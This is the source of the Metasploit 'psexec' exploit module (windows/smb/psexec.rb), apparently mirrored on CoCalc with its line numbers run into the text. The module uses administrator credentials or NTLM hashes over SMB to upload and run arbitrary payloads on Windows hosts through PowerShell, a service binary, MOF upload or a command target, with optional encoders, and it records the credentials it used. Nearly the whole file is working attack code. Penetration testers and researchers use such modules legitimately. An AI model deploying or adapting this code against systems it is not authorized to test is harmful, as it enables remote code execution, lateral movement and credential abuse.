CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/smb/psexec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45# Windows XP systems that are not part of a domain default to treating all6# network logons as if they were Guest. This prevents SMB relay attacks from7# gaining administrative access to these systems. This setting can be found8# under:9#10# Local Security Settings >11# Local Policies >12# Security Options >13# Network Access: Sharing and security model for local accounts1415class MetasploitModule < Msf::Exploit::Remote16Rank = ManualRanking1718include Msf::Exploit::Remote::SMB::Client::Psexec19include Msf::Exploit::Powershell20include Msf::Exploit::EXE21include Msf::Exploit::WbemExec22include Msf::Auxiliary::Report23include Msf::OptionalSession::SMB2425def initialize(info = {})26super(update_info(info,27'Name' => 'Microsoft Windows Authenticated User Code Execution',28'Description' => %q{29This module uses a valid administrator username and password (or30password hash) to execute an arbitrary payload. This module is similar31to the "psexec" utility provided by SysInternals. This module is now able32to clean up after itself. The service created by this tool uses a randomly33chosen name and description.34},35'Author' =>36[37'hdm',38'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module39'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders40],41'License' => MSF_LICENSE,42'Privileged' => true,43'DefaultOptions' =>44{45'WfsDelay' => 10,46'EXITFUNC' => 'thread'47},48'References' =>49[50[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)51[ 'OSVDB', '3106'],52[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],53[ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],54[ 'URL', 'http://sourceforge.net/projects/smbexec/' ]55],56'Payload' =>57{58'Space' => 3072,59'DisableNops' => true60},61'Platform' => 'win',62'Targets' =>63[64[ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],65[ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],66[ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],67[ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],68[ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]69],70'DefaultTarget' => 0,71# For the CVE, PsExec was first released around February or March 200172'DisclosureDate' => '1999-01-01'73))7475register_options(76[77OptString.new('SMBSHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''], aliases: ['SHARE'])78])7980register_advanced_options(81[82OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),83OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),84OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),85OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])86])87end8889def native_upload_with_workaround(smbshare)90service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"91service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''9293# Avoid implementing NTLMSSP on Windows XP94# https://seclists.org/metasploit/2009/q1/695if smb_peer_os == "Windows 5.1"96connect(versions: [1])97smb_login98end99native_upload(smbshare, service_filename, service_encoder)100end101102def validate_service_stub_encoder!103service_encoder = datastore['SERVICE_STUB_ENCODER']104return if service_encoder.nil? || service_encoder.empty?105106encoder = framework.encoders[service_encoder]107if encoder.nil?108raise Msf::OptionValidateError.new(109{110'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"111}112)113end114end115116def exploit117validate_service_stub_encoder!118119# automatically select an SMB share unless one is explicitly specified120if datastore['SMBSHARE'] && !datastore['SMBSHARE'].blank?121smbshare = datastore['SMBSHARE']122elsif target.name == 'Command'123smbshare = 'C$'124else125smbshare = 'ADMIN$'126end127128create_simple_smb_client!129130case target.name131when 'Automatic'132if powershell_installed?(smbshare, datastore['PSH_PATH'])133print_status('Selecting PowerShell target')134execute_powershell_payload135else136print_status('Selecting native target')137native_upload_with_workaround(smbshare)138end139when 'PowerShell'140execute_powershell_payload141when 'Native upload'142native_upload_with_workaround(smbshare)143when 'MOF upload'144mof_upload(smbshare)145when 'Command'146execute_command_payload(smbshare)147end148149handler150disconnect151end152153def report_auth154service_data = {155address: ::Rex::Socket.getaddress(datastore['RHOST'],true),156port: datastore['RPORT'],157service_name: 'smb',158protocol: 'tcp',159workspace_id: myworkspace_id160}161162credential_data = {163origin_type: :service,164module_fullname: self.fullname,165private_data: datastore['SMBPass'],166username: datastore['SMBUser'].downcase167}168169if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'170credential_data.merge!({171realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,172realm_value: datastore['SMBDomain']173})174end175176if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/177credential_data.merge!({:private_type => :ntlm_hash})178else179credential_data.merge!({:private_type => :password})180end181182credential_data.merge!(service_data)183184credential_core = create_credential(credential_data)185186login_data = {187access_level: 'Admin',188core: credential_core,189last_attempted_at: DateTime.now,190status: Metasploit::Model::Login::Status::SUCCESSFUL191}192193login_data.merge!(service_data)194create_credential_login(login_data)195end196197def create_simple_smb_client!198if session199print_status("Using existing session #{session.sid}")200client = session.client201self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)202203else204print_status('Connecting to the server...')205connect206207print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")208smb_login209210if !simple.client.auth_user && !datastore['ALLOW_GUEST']211print_line212print_error(213'FAILED! The remote host has only provided us with Guest privileges. ' \214'Please make sure that the correct username and password have been provided. ' \215'Windows XP systems that are not part of a domain will only provide Guest privileges ' \216'to network logins by default.'217)218print_line219disconnect220return221end222223unless datastore['SMBUser'].to_s.strip.empty?224report_auth225end226227end228end229end230231232